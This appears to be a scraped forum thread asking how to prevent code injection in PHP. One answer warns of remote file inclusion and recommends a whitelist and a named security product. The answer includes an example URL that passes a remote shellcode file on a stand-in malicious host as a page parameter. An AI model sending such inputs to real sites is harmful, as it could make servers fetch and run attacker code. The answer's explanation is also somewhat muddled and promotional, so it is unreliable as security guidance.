发表新帖
发表新帖

Best way to avoid code injection in PHP

前端 未结
关注
10 1189
臣服心动
臣服心动 2020-12-01 05:29

My website was recently attacked by, what seemed to me as, an innocent code:
10条回答
  • 遥遥无期
    遥遥无期 (楼主)
    2020-12-01 06:10

    Think of the URL is in this format:

    www.yourwebsite.com/index.php?page=http://malicodes.com/shellcode.txt

    If the shellcode.txt runs SQL or PHP injection, then your website will be at risk, right? Do think of this, using a whitelist would be of help.

    There is a way to filter all variables to avoid the hacking. You can use PHP IDS or OSE Security Suite to help avoid the hacking. After installing the security suite, you need to activate the suite, here is the guide:

    http://www.opensource-excellence.com/shop/ose-security-suite/item/414.html

    I would suggest you turn on layer 2 protection, then all POST and GET variables will be filtered especially the one I mentioned, and if there are attacks found, it will report to you immediately/

    Safety is always the priority

    0 讨论(0)
 看不清?
提交回复
热议问题